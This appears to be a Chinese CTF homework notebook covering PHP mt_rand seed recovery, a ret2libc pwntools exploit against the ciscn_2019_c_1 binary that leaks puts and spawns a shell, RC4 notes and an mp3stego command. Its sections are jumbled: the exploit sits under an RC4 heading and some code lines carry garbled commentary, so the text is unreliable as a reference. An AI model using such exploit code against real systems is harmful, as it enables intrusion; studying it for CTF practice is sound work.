2.11作业

php_mt_seed

rand=r-mt_rand【令r=0】

!rand就echo rand【得到mt_rand】

已知随机数逆推种子:有两

复制代码
<?php
mt_srand(1183822455);
$rand1 = mt_rand();
$rand2 = mt_rand();
$rand3 = mt_rand();
echo $rand2+$rand3,"\n";
mt_srand(3291176586);
$rand1 = mt_rand();
$rand2 = mt_rand();
$rand3 = mt_rand();
echo $rand1+$rand2;
?>

Cookies传入$token

2

ret2libc

.rodata:00000000001D8678 00000008 C /bin/sh

  1. puts_plt:获取puts函数的PLT(Procedure Linkage Table)地址。

  2. libc_start_main_got:获取__libc_start_main函数的GOT(Global Offset Table)地址。

  3. main:获取main函数的地址

    复制代码
    from pwn import *
    from LibcSearcher import LibcSearcher
    
    sh= process('./libc.so'):启动ret2libc3二进制文件的进程。
    ret2libc = ELF('./libc.so'):加载ret2libc3二进制文件,以便读取其符号和地址。

3【将rc4与其他算法进行组合】

初始化数组256

有两个参数key,keylen

一些rc4的脚本实现:

复制代码
from pwn import *
#p = remote('node3.buuoj.cn',28190)
p = process('./ciscn_2019_c_1')
context.log_level = 'debug'

puts_plt = 0x4006e0
puts_got = 0x602020
gets_got = 0x602050
pop_rdi = 0x0000000000400c83
main = 0x4009a0
#step 1 泄露puts函数的真实地址
payload = b'\x00'*0x58 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendlineafter('Input your choice!\n',str(1))
p.sendlineafter('Input your Plaintext to be encrypted\n',payload)
puts = u64(p.recv()[12:18].ljust(8,b'\x00'))
log.success("puts==>"+str(hex(puts)))

from LibcSearcher import *
#step 2 搜索该程序使用的libc版本,并找到内存中的system以及bin/sh 
libc = LibcSearcher('puts',puts)
libc_base = puts - libc.dump('puts')
system = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')
ret = 0x4006b9

# step 3 构造system函数
payload = b'\x00'*0x58  + p64(pop_rdi) + p64(bin_sh) + p64(system) + p64(main)
p.sendline(payload)
p.interactive()

初始化s表填充256+种子密钥K表256------k表对s表进行初始置换

密钥流------每个待加密字节与一个生成的伪随机数异或

4

如果key[i]==m[j]:

读取码表[j],

a=[]

a.append(b)

5

mp3stego

复制代码
decode -X -P simple 1.mp3
相关推荐
星释6 小时前
二级等保实战:MySQL安全加固
android·mysql·安全
沐怡旸11 小时前
【底层机制】垃圾回收(GC)底层原理深度解析
android·面试
whatever who cares11 小时前
android/java中gson的用法
android·java·开发语言
用户02738518402611 小时前
【Android】活动的正/异常生命周期和启动模式、标志位详解
android
nono牛12 小时前
MTK平台详解`adb devices`输出的序列号组成
android·linux·adb·智能手机
zhangphil13 小时前
Android通过SQL查询trace分析进程启动线程总数量
android
下位子13 小时前
『OpenGL学习滤镜相机』- Day3: 着色器基础 - GLSL 语言
android·opengl
bqliang13 小时前
Jetpack Navigation 3:领航未来
android·android studio·android jetpack
云存储小天使13 小时前
安卓蛙、苹果蛙为什么难互通?
android